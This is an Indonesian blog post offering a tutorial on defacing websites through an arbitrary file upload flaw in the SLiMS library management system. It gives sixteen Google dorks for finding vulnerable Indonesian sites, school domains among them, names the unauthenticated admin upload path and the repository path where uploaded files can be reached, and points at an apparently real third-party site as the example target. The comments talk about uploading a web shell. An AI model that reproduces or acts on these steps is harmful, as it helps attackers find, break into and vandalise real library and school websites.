Now Trending:

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

May 29, 2018 Web Hacking 4 Comments

Cara Deface dengan Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability – Kali ini saya akan share metode deface yang mungkin sedang ramai. Saya sendiri sering melihat web yang diretas dengan eksploit ini masuk ke mirror Zone-H. Yup, kita akan membahas bagaimana cara deface dengan exploit Slims CMS Senayan Arbitrary File Upload Vulnerability.

Exploit Slims CMS Senayan Arbitrary File Upload Vulnerability

#Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter
#Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team
#Vendor Homepage : slims.web.id
#Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/
#Date : 28/05/2018
#Affected Version : 5/6/7
#Tested on : Windows / Linux
#Exploit Risk : High

Oke berikut beberapa dork yang bisa digunakan. Silahkan kembangkan sendiri ya..

#Google Dork 1 :  intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id
#Google Dork 3 : inurl:''/slims5-meranti/'' site:id
#Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
#Google Dork 5 : Powered by SLiMS site:id
#Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii
#Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. 
#Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.
#Google Dork 9 :  SLiMS (Senayan Library Management System) is an open source Library Management System. 
                           It is build on Open source technology like PHP and MySQL.
#Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly
This software and this template are released Under GNU GPL License Version 3
#Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id
#Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog
#Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.
#Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue)
#Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id
#Google Dork 16 : Senayan | Open Source Library Management System :: OPAC

Celahnya ada disini:

/admin/modules/bibliography/pop_attach.php

Contoh
http://www.thaiabc.com/senayan/admin/modules/bibliography/pop_attach.php

Upload file berekstensi txt jpg gif png

Aksesnya ada di

/repository/namafile

Contoh

http://www.thaiabc.com/senayan/repository/hello.png

Oke mungkin sekian tutorial kali ini semoga bermanfaat.

Shares

Related Posts

About The Author

Yoo Cherry

sysadmin / blogger / geek / ubuntu user

4 Comments

  1. K3CEB0N6 April 12, 2019 Reply

    Bisa up shell gk stah?

  2. Wkwk May 10, 2019 Reply

    Gak tau gan

  3. K4MPR3T August 18, 2019 Reply

    Bisa, Coba aja Tamper Data nya

  4. Joledeng October 26, 2019 Reply

    Wih… Ada gambar zero two… Mantep gan

Leave a Reply